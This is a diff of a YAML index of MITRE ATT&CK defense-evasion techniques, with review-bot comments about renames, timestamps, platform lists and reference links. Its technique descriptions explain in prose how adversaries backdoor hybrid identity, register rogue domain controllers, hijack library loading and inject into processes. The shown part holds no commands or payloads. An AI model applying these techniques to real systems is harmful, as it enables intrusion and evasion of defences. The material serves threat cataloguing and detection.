- three options for synchronizing identities between Active Directory and Azure
- AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+ These can be maintained in a number of ways. For example, Microsoft Entra
+ ID includes three options for synchronizing identities between Active Directory
+ and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
(PHS), in which a privileged on-premises account synchronizes user password
- hashes between Active Directory and Azure AD, allowing authentication to Azure
- AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
- in which Azure AD authentication attempts are forwarded to an on-premises
+ hashes between Active Directory and Entra ID, allowing authentication to Entra
+ ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+ in which Entra ID authentication attempts are forwarded to an on-premises
PTA agent, which validates the credentials against Active Directory \n* Active
Directory Federation Services (AD FS), in which a trust relationship is established
- between Active Directory and Azure AD \n\nAD FS can also be used with other
+ between Active Directory and Entra ID \n\nAD FS can also be used with other
SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
process to AD FS and receive a token containing the hybrid users’ identity
and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
an adversary may be able to establish persistent privileged access to cloud
resources. For example, adversaries who compromise an on-premises server running
a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
- process that authorizes all attempts to authenticate to Azure AD, as well
+ process that authorizes all attempts to authenticate to Entra ID, as well
as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
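Review bot: the Azure AD to Microsoft Entra ID rename is applied to the prose only, and that is correct: the `AzureADConnectAuthenticationAgentService` process name in the PTA example is a real service name and must stay as-is, and the `(Citation: Azure AD Hybrid Identity)`, `(Citation: Azure AD Connect for Read Teamers)` and `(Citation: AADInternals Azure AD On-Prem to Cloud)` markers are lookup keys into `external_references`, so they must not be renamed in the description alone. One pre-existing typo is now more visible: `Read Teamers` should be `Red Teamers`, but fixing it means changing the citation marker and the matching `source_name` entry together, so it belongs in a separate change rather than this sync.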
@@ -4905,9 +5049,9 @@ defense-evasion:
any set of claims, thereby bypassing multi-factor authentication and defined
AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
to modify the hybrid identity authentication process from the cloud. For example,
- adversaries who compromise a Global Administrator account in an Azure AD tenant
+ adversaries who compromise a Global Administrator account in an Entra ID tenant
may be able to register a new PTA agent via the web console, similarly allowing
- them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+ them to harvest credentials and log into the Entra ID environment as any user.(Citation:
Mandiant Azure AD Backdoors)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -4916,21 +5060,22 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- SaaS
- - Google Workspace
- - Office 365
- IaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Praetorian
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -4970,9 +5115,6 @@ defense-evasion:
url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.015:
technique:
@@ -5035,7 +5177,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.012:
technique:
@@ -5095,7 +5236,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.012
atomic_tests: []
T1207:
@@ -5136,7 +5276,7 @@ defense-evasion:
description: Lucand,G. (2018, February 18). Detect DCShadow, impossible?.
Retrieved March 30, 2018.
source_name: ADDSecurity DCShadow Feb 2018
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T21:20:04.850Z'
name: Rogue Domain Controller
description: |-
Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.
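Review bot: the modified timestamp for T1207 goes backwards in this hunk, from 2022-05-11T14:00:00.188Z to 2022-03-08T21:20:04.850Z, with nothing else in the object changing. The same regression recurs below for T1553.006, T1574.006, T1222, T1134.002, T1548.001, T1218.008, T1055.013, T1036.002 and T1542.002, and in each case the value being removed ends in T14:00:00.188Z while the replacement is an arbitrary time of day, which looks like a release-wide stamp giving way to each object's own last-edit time. Anything that compares modified to decide whether a technique needs re-syncing will now see these as older than before, so confirm the source bundle is the intended one rather than a mixed-version export.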
@@ -5167,8 +5307,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1207
atomic_tests: []
T1553.006:
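Review bot: for T1207, x_mitre_attack_spec_version: 2.1.0 is deleted outright together with spec_version and is not re-added anywhere else in the object, unlike the techniques above where the field is moved and bumped to 3.2.0. The same outright drop happens for T1218.008, T1055.013, T1574.005, T1036.002 and T1542.002 further down. Either keep the field at its previous value for objects that were not refreshed upstream, or document that it is intentionally omitted for them; as written, the index ends up with some techniques carrying the key and others not, which is awkward for any consumer that treats it as required.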
@@ -5258,7 +5396,7 @@ defense-evasion:
Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but
vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla
Driver Loader)"
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:00:03.480Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Subvert Trust Controls: Code Signing Policy Modification'
x_mitre_detection: 'Monitor processes and command-line arguments for actions
@@ -5282,12 +5420,11 @@ defense-evasion:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.006
atomic_tests: []
T1610:
technique:
- modified: '2024-04-11T21:24:42.680Z'
+ modified: '2024-10-15T15:06:17.124Z'
name: Deploy a container
description: |-
Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -5366,7 +5503,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1610
atomic_tests: []
T1112:
@@ -5451,12 +5587,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1112
atomic_tests: []
T1574.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:25:57.059Z'
name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -5475,6 +5610,7 @@ defense-evasion:
phase_name: defense-evasion
x_mitre_contributors:
- Stefan Kanthak
+ x_mitre_deprecated: false
x_mitre_detection: |
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -5482,7 +5618,6 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -5502,29 +5637,31 @@ defense-evasion:
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
created: '2020-03-13T17:48:58.999Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/008
external_id: T1574.008
+ - source_name: Microsoft Environment Property
+ description: Microsoft. (2011, October 24). Environment Property. Retrieved
+ July 27, 2016.
+ url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+ - source_name: Microsoft WinExec
+ description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
- source_name: Windows NT Command Shell
description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
December 5, 2014.
url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
- - source_name: Microsoft WinExec
- description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms687393
- - source_name: Microsoft Environment Property
- description: Microsoft. (2011, October 24). Environment Property. Retrieved
- July 27, 2016.
- url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.008
atomic_tests: []
T1535:
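Review bot: the external_references list for T1574.008 is rewritten in a different order (Microsoft Environment Property and Microsoft WinExec move ahead of Microsoft CreateProcess and Windows NT Command Shell), which hides the real changes: the CreateProcess and WinExec links move from msdn.microsoft.com to learn.microsoft.com with 'Retrieved September 12, 2024', and revoked: false plus x_mitre_attack_spec_version: 3.2.0 are added. The new CreateProcess URL targets the ANSI entry (nf-processthreadsapi-createprocessa), which is fine as a citation, but the Windows NT Command Shell entry keeps its December 5, 2014 retrieval date and docs.microsoft.com previous-versions URL and is worth re-verifying in the same link-refresh pass.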
@@ -5575,7 +5712,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027.001:
technique:
@@ -5642,12 +5778,11 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1027.001
atomic_tests: []
T1484.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-23T22:11:01.884Z'
name: 'Domain Policy Modification: Group Policy Modification'
description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
the intended discretionary access controls for a domain, usually with the
@@ -5683,6 +5818,10 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Tristan Bennett, Seamless Intelligence
+ x_mitre_deprecated: false
x_mitre_detection: |-
It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
@@ -5694,16 +5833,12 @@ defense-evasion:
GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
x_mitre_version: '1.0'
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Tristan Bennett, Seamless Intelligence
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Active Directory: Active Directory Object Creation'
@@ -5739,12 +5874,12 @@ defense-evasion:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Harmj0y SeEnableDelegationPrivilege Right
description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
- You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
- url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+ You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
- source_name: TechNet Group Policy Basics
description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
Understanding the Structure of a Group Policy Object. Retrieved March 5,
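Review bot: both harmj0y references move from http://www.harmj0y.net/blog/... to https://blog.harmj0y.net/... with a refreshed retrieval date of September 23, 2024, which is the right fix for the old host. The TechNet Group Policy Basics entry immediately after them keeps its March 5 retrieval date and its blogs.technet.microsoft.com URL, so it has not been re-verified; since this hunk is refreshing stale links for the same technique, check that one too rather than leaving it for a later pass.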
@@ -5752,14 +5887,13 @@ defense-evasion:
url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.001
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -5774,6 +5908,7 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -5782,18 +5917,18 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
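Review bot: the x_mitre_modified_by_ref line added above x_mitre_platforms here, and the x_mitre_attack_spec_version: 3.2.0 line added above x_mitre_deprecated in the previous hunk, are both deleted with identical values from after object_marking_refs in the next hunk, so that part is pure reordering. The substantive change is the platform list for T1078.001: 'Azure AD', 'Office 365' and 'Google Workspace' are replaced by 'Office Suite' and 'Identity Provider' and x_mitre_version moves from '1.3' to '1.4'. The same three platform names are removed from T1548, T1548.005 and T1070 below, so any consumer that filters techniques by one of those names will silently stop matching these four techniques after this change; that impact belongs in the commit message.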
@@ -5825,14 +5960,11 @@ defense-evasion:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests: []
T1574.006:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.146Z'
name: 'Hijack Execution Flow: LD_PRELOAD'
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables the dynamic linker uses to load shared libraries. During
@@ -5953,7 +6085,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1574.006
atomic_tests: []
T1070.001:
@@ -6027,12 +6158,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.001
atomic_tests: []
T1222:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T17:54:06.038Z'
name: File and Directory Permissions Modification
description: "Adversaries may modify file or directory permissions/attributes
to evade access control lists (ACLs) and access protected files.(Citation:
@@ -6129,12 +6259,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1222
atomic_tests: []
T1548:
technique:
- modified: '2024-04-15T20:52:09.908Z'
+ modified: '2024-10-15T15:32:21.811Z'
name: Abuse Elevation Control Mechanism
description: 'Adversaries may circumvent mechanisms designed to control elevate
privileges to gain higher-level permissions. Most modern systems contain native
@@ -6166,11 +6295,10 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- IaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'User Account: User Account Modification'
@@ -6211,11 +6339,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1134.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T21:14:37.714Z'
name: Create Process with Token
description: |-
Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW
and runas
.(Citation: Microsoft RunAs)
@@ -6271,12 +6398,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.002
atomic_tests: []
T1548.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-15T18:43:20.995Z'
name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
description: |-
An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -6333,7 +6459,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.001
atomic_tests: []
T1218.008:
@@ -6369,7 +6494,7 @@ defense-evasion:
description: 'Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November
20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit
Against Russian Banks. Retrieved March 7, 2019.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:52:49.877Z'
name: 'Signed Binary Proxy Execution: Odbcconf'
description: "Adversaries may abuse odbcconf.exe to proxy execution of malicious
payloads. Odbcconf.exe is a Windows utility that allows you to configure Open
@@ -6402,13 +6527,11 @@ defense-evasion:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.008
atomic_tests: []
T1548.005:
technique:
- modified: '2024-03-28T15:30:09.313Z'
+ modified: '2024-10-15T16:07:49.519Z'
name: Temporary Elevated Cloud Access
description: "Adversaries may abuse permission configurations that allow them
to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -6470,10 +6593,9 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- - Azure AD
- - Office 365
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
@@ -6531,7 +6653,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.013:
technique:
@@ -6573,7 +6694,7 @@ defense-evasion:
description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
December 20, 2017.
source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:43:48.848Z'
name: Process Doppelgänging
description: "Adversaries may inject malicious code into process via process
doppelgänging in order to evade process-based defenses as well as possibly
@@ -6632,41 +6753,10 @@ defense-evasion:
- Administrator
- SYSTEM
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1578.003:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
- type: attack-pattern
- created: '2020-06-16T17:23:06.508Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1578.003
- url: https://attack.mitre.org/techniques/T1578/003
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: AWS CloudTrail Search
- url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
- description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
- Retrieved June 17, 2020.
- - source_name: Azure Activity Logs
- url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
- description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
- 2020.
- - source_name: Cloud Audit Logs
- url: https://cloud.google.com/logging/docs/audit#admin-activity
- description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-30T13:28:37.415Z'
name: Delete Cloud Instance
description: |-
An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.
@@ -6675,20 +6765,50 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
+ x_mitre_deprecated: false
x_mitre_detection: |-
The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.
In AWS, CloudTrail logs capture the deletion of an instance in the TerminateInstances
event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances delete
to delete a VM.(Citation: Cloud Audit Logs)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Instance: Instance Metadata'
- 'Instance: Instance Deletion'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
+ created: '2020-06-16T17:23:06.508Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1578/003
+ external_id: T1578.003
+ - source_name: AWS CloudTrail Search
+ description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+ Retrieved June 17, 2020.
+ url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+ - source_name: Cloud Audit Logs
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: Azure Activity Logs
+ description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+ 2020.
+ url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1574.005:
technique:
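Review bot: x_mitre_permissions_required: [User] is the one field of the old T1578.003 object that does not reappear in this re-emitted block, so it is a real deletion rather than part of the re-sort; if that matches the upstream object it should be called out, otherwise restore it. The rest of the block is the head of the object (platforms, domains, id, type, created, external_references, object_marking_refs) deleted in the previous hunk and rewritten in a different order, with the genuine changes being the new contributor 'Arun Seelagan, CISA', x_mitre_deprecated: false and revoked: false, x_mitre_version '1.1' to '1.2', x_mitre_attack_spec_version: 3.2.0, and the Mandiant M-Trends 2020 URL moving from content.fireeye.com to https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf. That URL change keeps 'Retrieved April 24, 2020', a date before the new path could have existed (the path itself is dated 2021-09), so the retrieval date should be updated along with the link.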
@@ -6718,7 +6838,7 @@ defense-evasion:
description: 'Stefan Kanthak. (2015, December 8). Executable installers are
vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
of privilege. Retrieved December 4, 2014.'
- modified: '2020-10-27T14:49:39.188Z'
+ modified: '2020-03-26T19:20:23.030Z'
name: Executable Installer File Permissions Weakness
description: |-
